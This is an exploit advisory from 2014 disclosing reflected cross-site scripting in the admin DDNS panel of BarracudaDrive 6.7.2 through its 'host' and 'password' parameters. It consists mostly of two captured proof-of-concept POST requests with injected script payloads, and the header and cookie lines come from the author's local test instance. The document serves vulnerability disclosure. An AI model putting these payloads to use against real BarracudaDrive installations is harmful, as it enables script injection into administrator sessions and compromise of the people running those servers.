BarracudaDrive 6.7.2 Cross Site Scripting

`###############################################################################  
#Exploit Title : BarracudaDrive 6.7.2 Administrator Panel Rflected Cross-Site Scripting  
#Author : Govind Singh aka NullCool  
#Vendor : http://barracudadrive.com   
#Software : BarracudaDrive 6.7.2  
#Date : 15/06/2014  
#Discovered At : IHT Lab ( 1ND14N H4X0R5 T34M )   
#Love to : error1046, DeadMan India, CyberGladiator, Amit Kumar Achina   
################################################################################  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
--=={ >:)o Overview of vulnerability o(:< }==--  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
BarracudaDrive Multiple Reflected Cross-Site Scripting in ddns panel   
  
Reflected Cross-Site Scripting Vulnerabilities in BarracudaDrive, user input is not properly checked before submission.  
  
1) "host" parameter to "/rtl/protected/admin/ddns/" is not properly verified before submission. This can be exploited to execute arbitrary scripts code.   
  
2) "password" parameter to "/rtl/protected/admin/ddns/" is not properly verified before submission. This can be exploited to execute arbitrary scripts code.  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
--=={ >:)o Proof of Concept: o(:< }==--  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
1).  
  
Host=localhost:9357  
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0  
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=en-US,en;q=0.5  
Accept-Encoding=gzip, deflate  
Referer=http://localhost:9357/rtl/protected/admin/ddns/  
Cookie=tzone=--330; __utma=111872281.147155010.1402786769.1402791987.1402794883.3; __utmz=111872281.1402786769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=111872281.3.10.1402794883; z9ZAqJtI=d4efe303539cfccc; __utmc=111872281  
Connection=keep-alive  
Content-Type=application/x-www-form-urlencoded  
Content-Length=81  
POSTDATA=provider=DNSdynamic&host="><script>alert(123);</script>&username=%3E&password=%3E  
  
Poc image : http://prntscr.com/3sym87  
  
2).  
  
Host=localhost:9357  
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0  
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=en-US,en;q=0.5  
Accept-Encoding=gzip, deflate  
Referer=http://localhost:9357/rtl/protected/admin/ddns/  
Cookie=tzone=--330; __utma=111872281.147155010.1402786769.1402791987.1402794883.3; __utmz=111872281.1402786769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=111872281.3.10.1402794883; z9ZAqJtI=d4efe303539cfccc; __utmc=111872281  
Connection=keep-alive  
Content-Type=application/x-www-form-urlencoded  
Content-Length=78  
POSTDATA=provider=DNSdynamic&host=&username=%3E&password="><script>alert('Govind Singh');</script>  
  
Poc Image : http://prntscr.com/3symgz  
`